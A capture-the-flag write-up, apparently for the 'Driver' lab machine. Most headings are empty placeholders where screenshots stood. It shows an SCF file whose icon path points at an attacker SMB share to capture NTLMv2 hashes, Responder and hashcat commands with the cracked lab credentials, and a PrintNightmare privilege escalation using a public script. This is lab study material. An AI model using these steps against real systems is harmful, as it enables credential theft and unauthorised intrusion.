Driver

Enumeration

Ports and Services

Software Installed:

Nmap Scan Results:

Main Webpage:

Firmware Updates Page:

Initial Foothold

Site is vulnerable to a SCF attack
https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/

Setup according to article:
pentest.scf:

[Shell]
Command=2
IconFile=\\10.10.14.31\share\pentest.ico
[Taskbar]
Command=ToggleDesktop

Ran responder:
CMD: responder -wrf –lm -v -I tun0

Uploaded @pentest.scf to Firmware Update Page and captured NTLMv2 Hashes:

Cracked Password with hashcat:
CMD: hashcat -a 0 -m 5600 Driver-Hash -o Driver-Cracked.txt /usr/share/wordlists/rockyou.txt

Username: DRIVER\Tony
Password: liltony

User.txt Proof Screenshot

User.txt Contents

Privilege Escalation

Possible Printnightmare vulnerability:

User Tony is able to install drivers as a low priv user
Article:
https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html

Copied PowerShell script:
https://github.com/calebstewart/CVE-2021-1675

Transferred to victim and executed creating user pentest:

User Pentest:

Logged in as pentest

RootScreenshot Here: